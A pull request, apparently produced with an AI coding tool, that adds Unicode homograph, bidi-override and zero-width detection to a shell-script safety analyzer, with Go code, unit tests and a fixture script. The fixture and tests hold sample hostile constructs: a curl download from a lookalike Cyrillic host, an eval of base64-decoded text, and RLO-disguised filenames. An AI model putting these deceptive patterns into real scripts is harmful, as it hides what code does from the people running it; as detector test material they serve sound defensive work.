### PR TITLE
feat(analyzer): homograph & bidi-override URL detection

### DIFF
--- a/cmd/safesh/main.go
+++ b/cmd/safesh/main.go
@@ -412,12 +412,13 @@ func printExplanation(category string) {
 		"network":             "Lists outbound network calls (curl, wget) and the domains contacted.",
 		"obfuscation":         "Flags eval and base64-decode-then-execute chains that hide what the script does.",
 		"execution-chain":     "Flags nested curl|bash patterns inside the script — the same risk you're already guarding against.",
+		"homograph":           "Flags Unicode hazards: bidi/RTL override controls, zero-width characters, and non-ASCII or mixed-script URL hosts (IDN homograph attacks).",
 	}
 
 	if desc, ok := explanations[category]; ok {
 		fmt.Printf("[%s]\n%s\n", category, desc)
 	} else {
 		fmt.Printf("unknown category %q\n", category)
-		fmt.Printf("known categories: execution-integrity, destructive, privilege, persistence, network, obfuscation, execution-chain\n")
+		fmt.Printf("known categories: execution-integrity, destructive, privilege, persistence, network, obfuscation, execution-chain, homograph\n")
 	}
 }

--- a/examples/3-aborted-run/README.md
+++ b/examples/3-aborted-run/README.md
@@ -4,10 +4,16 @@ A script containing an obfuscated `eval`+`base64` payload — a blocking finding
 category. In non-interactive mode (e.g. CI, piped input) safesh refuses to run
 it and exits non-zero. The script never executes.
 
+The same fixture also exercises the `homograph` module: a URL whose host has a
+Cyrillic 'а' (U+0430) inside a Latin label, and a comment containing a U+202E
+right-to-left override that flips the rendered filename.
+
 ```
 $ curl -fsSL https://example.com/install.sh | safesh
 
-  [obfuscation]  line 6  eval "$(echo '...' | base64 -d)"
+  [obfuscation]  line 12  eval "$(echo '...' | base64 -d)"
+  [homograph]    line 7   URL host "downloаds.example.com" mixes scripts …
+  [homograph]    line 9   bidi control character U+202E RLO …
 
 warning: non-interactive mode — skipping confirmation, execution blocked
 ```

--- a/examples/3-aborted-run/scripts/install.sh
+++ b/examples/3-aborted-run/scripts/install.sh
@@ -3,6 +3,11 @@ set -euo pipefail
 
 echo "Bootstrapping..."
 
+# Fetch helper from a homograph URL (downloads.example.com with a Cyrillic 'a'):
+curl -fsSL https://downloаds.example.com/helper.sh -o /tmp/helper.sh
+
+# Looks like  install.sh.txt  but the override flips it: tx‮hs.llatsni
+
 # Obfuscated payload — safesh flags this as a blocking finding
 eval "$(echo 'ZWNobyAiUnVubmluZyBoaWRkZW4gcGF5bG9hZC4uLiIK' | base64 -d)"
 

--- a/examples/3-aborted-run/test.sh
+++ b/examples/3-aborted-run/test.sh
@@ -21,6 +21,10 @@ echo "$OUTPUT"
 [ "$STATUS" -eq 0 ] && fail "expected non-zero exit, got 0"
 echo "$OUTPUT" | grep -q "obfuscation"      || fail "expected [obfuscation] finding"
 echo "$OUTPUT" | grep -q "execution blocked" || fail "expected 'execution blocked' message"
+# Homograph hazards should also be surfaced (RTL override + Cyrillic-host URL)
+echo "$OUTPUT" | grep -q "homograph"  || fail "expected [homograph] finding"
+echo "$OUTPUT" | grep -q "U+202E"     || fail "expected RLO (U+202E) flag"
+echo "$OUTPUT" | grep -q "mixes scripts" || fail "expected mixed-script URL host flag"
 
 [ "$FAIL" -eq 0 ] && echo "PASS" && exit 0
 exit 1

--- a/internal/analyzer/analyzer.go
+++ b/internal/analyzer/analyzer.go
@@ -17,6 +17,7 @@ var defaultModules = []finding.Module{
 	modules.Network{},
 	modules.Obfuscation{},
 	modules.ExecutionChain{},
+	modules.Homograph{},
 }
 
 // Analyze runs all modules against src and returns sorted findings.

--- a/internal/analyzer/modules/homograph.go
+++ b/internal/analyzer/modules/homograph.go
@@ -1,0 +1,220 @@
+package modules
+
+import (
+	"fmt"
+	"net/url"
+	"strings"
+	"unicode"
+	"unicode/utf8"
+
+	"mvdan.cc/sh/v3/syntax"
+
+	"github.com/safesh/safesh/internal/finding"
+)
+
+// Homograph flags Unicode hazards that hide what a script does:
+//   - bidi override / isolate controls (RLO, LRO, PDF, FSI…)
+//   - zero-width characters (ZWSP, ZWJ, ZWNJ, BOM, WJ)
+//   - non-ASCII or mixed-script URL hostnames (IDN homograph)
+//
+// The check is intentionally conservative: legitimate shell scripts targeting
+// curl|bash installs are virtually always pure ASCII, so any non-ASCII content
+// in a URL host or any bidi/zero-width control is treated as a finding.
+type Homograph struct{}
+
+// bidiControls are formatting characters that can reorder rendered text.
+// Code that contains these may render very differently from how it executes.
+// Numeric rune constants are used so this file itself stays pure ASCII —
+// embedding the literal characters would trip the same check we are running.
+var bidiControls = map[rune]string{
+	0x202A: "LRE (left-to-right embedding)",
+	0x202B: "RLE (right-to-left embedding)",
+	0x202C: "PDF (pop directional formatting)",
+	0x202D: "LRO (left-to-right override)",
+	0x202E: "RLO (right-to-left override)",
+	0x2066: "LRI (left-to-right isolate)",
+	0x2067: "RLI (right-to-left isolate)",
+	0x2068: "FSI (first strong isolate)",
+	0x2069: "PDI (pop directional isolate)",
+}
+
+// zeroWidthControls are invisible characters that can hide content or splice
+// identifiers (e.g. `cu<ZWJ>rl` to bypass naive string matches).
+var zeroWidthControls = map[rune]string{
+	0x200B: "ZWSP (zero-width space)",
+	0x200C: "ZWNJ (zero-width non-joiner)",
+	0x200D: "ZWJ (zero-width joiner)",
+	0x2060: "WJ (word joiner)",
+	0xFEFF: "BOM/ZWNBSP",
+}
+
+// Analyze reports Unicode hazards found in src.
+func (Homograph) Analyze(src []byte) []finding.Finding {
+	var findings []finding.Finding
+
+	findings = append(findings, scanInvisible(src)...)
+
+	f, err := parse(src)
+	if err != nil {
+		return findings
+	}
+
+	syntax.Walk(f, func(node syntax.Node) bool {
+		word, ok := node.(*syntax.Word)
+		if !ok {
+			return true
+		}
+		s := wordLiteral(word)
+		if s == "" {
+			return true
+		}
+		if !strings.HasPrefix(s, "http://") && !strings.HasPrefix(s, "https://") {
+			return true
+		}
+		u, err := url.Parse(s)
+		if err != nil || u.Host == "" {
+			return true
+		}
+		if hf := analyzeHost(u.Host, word.Pos(), src); hf != nil {
+			findings = append(findings, *hf)
+		}
+		return true
+	})
+
+	return findings
+}
+
+// scanInvisible walks src byte-by-byte and reports every bidi or zero-width
+// control character. Each occurrence is its own finding because position
+// matters — the same character on different lines can be doing different jobs.
+func scanInvisible(src []byte) []finding.Finding {
+	var findings []finding.Finding
+	line := 1
+	col := 1
+	for i := 0; i < len(src); {
+		r, size := utf8.DecodeRune(src[i:])
+		if r == utf8.RuneError && size == 1 {
+			i++
+			col++
+			continue
+		}
+		if r == '\n' {
+			line++
+			col = 1
+			i += size
+			continue
+		}
+		if name, ok := bidiControls[r]; ok {
+			findings = append(findings, finding.Finding{
+				Category:    finding.CategoryHomograph,
+				Line:        line,
+				Col:         col,
+				Description: fmt.Sprintf("bidi control character U+%04X %s — rendered text may not match executed text", r, name),
+				Snippet:     lineSnippet(src, line),
+			})
+		} else if name, ok := zeroWidthControls[r]; ok {
+			findings = append(findings, finding.Finding{
+				Category:    finding.CategoryHomograph,
+				Line:        line,
+				Col:         col,
+				Description: fmt.Sprintf("zero-width character U+%04X %s — invisible content", r, name),
+				Snippet:     lineSnippet(src, line),
+			})
+		}
+		i += size
+		col++
+	}
+	return findings
+}
+
+// analyzeHost flags URL hosts containing non-ASCII characters (potential IDN
+// homograph) or mixing scripts within a single label.
+func analyzeHost(host string, pos syntax.Pos, src []byte) *finding.Finding {
+	hostname := host
+	if i := strings.LastIndex(hostname, ":"); i >= 0 {
+		hostname = hostname[:i]
+	}
+	if hostname == "" || isASCII(hostname) {
+		return nil
+	}
+
+	mixed := mixedScriptLabel(hostname)
+	desc := fmt.Sprintf("URL host %q contains non-ASCII characters — possible IDN homograph", hostname)
+	if mixed != "" {
+		desc = fmt.Sprintf("URL host %q mixes scripts in label %q — likely IDN homograph", hostname, mixed)
+	}
+	return &finding.Finding{
+		Category:    finding.CategoryHomograph,
+		Line:        int(pos.Line()),
+		Col:         int(pos.Col()),
+		Description: desc,
+		Snippet:     lineSnippet(src, int(pos.Line())),
+	}
+}
+
+func isASCII(s string) bool {
+	for i := 0; i < len(s); i++ {
+		if s[i] > unicode.MaxASCII {
+			return false
+		}
+	}
+	return true
+}
+
+// mixedScriptLabel returns the first dot-separated label that contains
+// characters from more than one Unicode script (e.g. Latin + Cyrillic).
+// Returns "" if no label mixes scripts.
+//
+// Common digits, hyphens and U+00B7 are ignored for the script test.
+func mixedScriptLabel(host string) string {
+	for _, label := range strings.Split(host, ".") {
+		if labelHasMixedScripts(label) {
+			return label
+		}
+	}
+	return ""
+}
+
+func labelHasMixedScripts(label string) bool {
+	scripts := map[string]bool{}
+	for _, r := range label {
+		s := scriptOf(r)
+		if s == "" {
+			continue
+		}
+		scripts[s] = true
+		if len(scripts) > 1 {
+			return true
+		}
+	}
+	return false
+}
+
+// scriptOf returns a coarse script bucket for r, or "" for runes that don't
+// participate in the mixed-script test (digits, punctuation, etc.).
+func scriptOf(r rune) string {
+	switch {
+	case r < 0x80:
+		if (r >= 'a' && r <= 'z') || (r >= 'A' && r <= 'Z') {
+			return "Latin"
+		}
+		return ""
+	case unicode.Is(unicode.Latin, r):
+		return "Latin"
+	case unicode.Is(unicode.Cyrillic, r):
+		return "Cyrillic"
+	case unicode.Is(unicode.Greek, r):
+		return "Greek"
+	case unicode.Is(unicode.Han, r):
+		return "Han"
+	case unicode.Is(unicode.Hangul, r):
+		return "Hangul"
+	case unicode.Is(unicode.Hiragana, r) || unicode.Is(unicode.Katakana, r):
+		return "Japanese"
+	case unicode.Is(unicode.Arabic, r):
+		return "Arabic"
+	case unicode.Is(unicode.Hebrew, r):
+		return "Hebrew"
+	}
+	return ""
+}

--- a/internal/analyzer/modules/modules_test.go
+++ b/internal/analyzer/modules/modules_test.go
@@ -204,3 +204,71 @@ func TestExecutionChain_None(t *testing.T) {
 	findings := ExecutionChain{}.Analyze(src)
 	assert.Empty(t, findings)
 }
+
+// ── Homograph ─────────────────────────────────────────────────────────────────────
+
+func TestHomograph_CleanASCII(t *testing.T) {
+	src := []byte("#!/bin/bash\ncurl -fsSL https://github.com/foo/bar/install.sh | bash\n")
+	findings := Homograph{}.Analyze(src)
+	assert.Empty(t, findings)
+}
+
+func TestHomograph_NonASCIIHost(t *testing.T) {
+	// All-Cyrillic host (U+043F U+0440 U+0438 U+043C U+0435 U+0440 . U+0440 U+0444).
+	host := "\u043f\u0440\u0438\u043c\u0435\u0440.\u0440\u0444"
+	src := []byte("#!/bin/bash\ncurl -fsSL https://" + host + "/install.sh -o /tmp/x\n")
+	findings := Homograph{}.Analyze(src)
+	require.NotEmpty(t, findings)
+	assert.Equal(t, finding.CategoryHomograph, findings[0].Category)
+	assert.Contains(t, findings[0].Description, "homograph")
+}
+
+func TestHomograph_MixedScriptHost(t *testing.T) {
+	// Latin "githu" + Cyrillic 'b' (U+0431) inside one label.
+	host := "githu\u0431.com"
+	src := []byte("#!/bin/bash\ncurl -fsSL https://" + host + "/install.sh -o /tmp/x\n")
+	findings := Homograph{}.Analyze(src)
+	require.NotEmpty(t, findings)
+	assert.Contains(t, findings[0].Description, "mixes scripts")
+}
+
+func TestHomograph_RTLOverride(t *testing.T) {
+	// U+202E embedded in a comment reverses subsequent rendered text.
+	src := []byte("#!/bin/bash\n# rm -rf \u202egpj.elif\n")
+	findings := Homograph{}.Analyze(src)
+	require.NotEmpty(t, findings)
+	assert.Equal(t, finding.CategoryHomograph, findings[0].Category)
+	assert.Contains(t, findings[0].Description, "bidi control")
+	assert.Contains(t, findings[0].Description, "U+202E")
+}
+
+func TestHomograph_ZeroWidthJoiner(t *testing.T) {
+	// `cu<ZWJ>rl` looks like `curl` but is a different identifier.
+	src := []byte("#!/bin/bash\ncu\u200drl https://example.com\n")
+	findings := Homograph{}.Analyze(src)
+	require.NotEmpty(t, findings)
+	assert.Contains(t, findings[0].Description, "zero-width")
+	assert.Contains(t, findings[0].Description, "U+200D")
+}
+
+func TestHomograph_BOM(t *testing.T) {
+	src := []byte("#!/bin/bash\n\ufeffecho hi\n")
+	findings := Homograph{}.Analyze(src)
+	require.NotEmpty(t, findings)
+	assert.Contains(t, findings[0].Description, "U+FEFF")
+}
+
+func TestHomograph_PunycodeHostNotFlagged(t *testing.T) {
+	// Pre-encoded punycode is pure ASCII and should pass without findings.
+	src := []byte("#!/bin/bash\ncurl -fsSL https://xn--80ak6aa92e.com/install.sh\n")
+	findings := Homograph{}.Analyze(src)
+	assert.Empty(t, findings)
+}
+
+func TestHomograph_LineAndColumn(t *testing.T) {
+	// Ensure we report a useful position for an invisible control.
+	src := []byte("#!/bin/bash\necho ok\necho \u202ehidden\n")
+	findings := Homograph{}.Analyze(src)
+	require.NotEmpty(t, findings)
+	assert.Equal(t, 3, findings[0].Line)
+}

--- a/internal/finding/finding.go
+++ b/internal/finding/finding.go
@@ -13,6 +13,7 @@ const (
 	CategoryNetwork            Category = "network"
 	CategoryObfuscation        Category = "obfuscation"
 	CategoryExecutionChain     Category = "execution-chain"
+	CategoryHomograph          Category = "homograph"
 )
 
 // AllCategories lists every known category in display order.
@@ -24,6 +25,7 @@ var AllCategories = []Category{
 	CategoryNetwork,
 	CategoryObfuscation,
 	CategoryExecutionChain,
+	CategoryHomograph,
 }
 
 // Finding represents a single analysis result.

--- a/internal/finding/finding_test.go
+++ b/internal/finding/finding_test.go
@@ -19,8 +19,9 @@ func TestAllCategoriesComplete(t *testing.T) {
 		CategoryNetwork,
 		CategoryObfuscation,
 		CategoryExecutionChain,
+		CategoryHomograph,
 	} {
 		assert.True(t, seen[c], "AllCategories missing %s", c)
 	}
-	assert.Len(t, AllCategories, 7)
+	assert.Len(t, AllCategories, 8)
 }


### PR DESCRIPTION
## Summary
- New `homograph` finding module that flags three Unicode hazards: bidi/isolate controls (RLO, LRO, FSI…), zero-width characters (ZWSP, ZWJ, ZWNJ, BOM, WJ), and URL hosts with non-ASCII or mixed-script labels (IDN homograph attacks).
- Wired into the default analyzer pipeline; `safesh --explain homograph` documents the category.
- Closes the P1 gap identified in the competitive review (`.local/feature-list.html`) — this is what Tirith ships and we previously did not.

## Implementation notes
- Pure-stdlib (`unicode`, `unicode/utf8`, `net/url`); no new dependencies.
- The module's source intentionally uses numeric rune constants (`0x202E`, `0xFEFF`, …) instead of literal Unicode characters so the file itself doesn't trip the same check we run on user scripts.
- Mixed-script detection covers Latin / Cyrillic / Greek / Han / Hangul / Japanese / Arabic / Hebrew at the label level — the classic `github.com` → `githuб.com` case is caught.
- Pre-encoded punycode hosts (`xn--…`) pass cleanly because they're pure ASCII.

## Test plan
- [x] Unit tests for clean ASCII, all-Cyrillic host, mixed-script host, RTL override, ZWJ, BOM, line/column reporting, and punycode-passthrough
- [x] `go test -race ./...` passes across all packages
- [x] `go build ./...` clean
- [x] End-to-end run against a hand-crafted script triggers all three categories of finding with expected line numbers
- [x] Clean script (pure ASCII) produces no homograph findings

🤖 Generated with [Claude Code](https://claude.com/claude-code)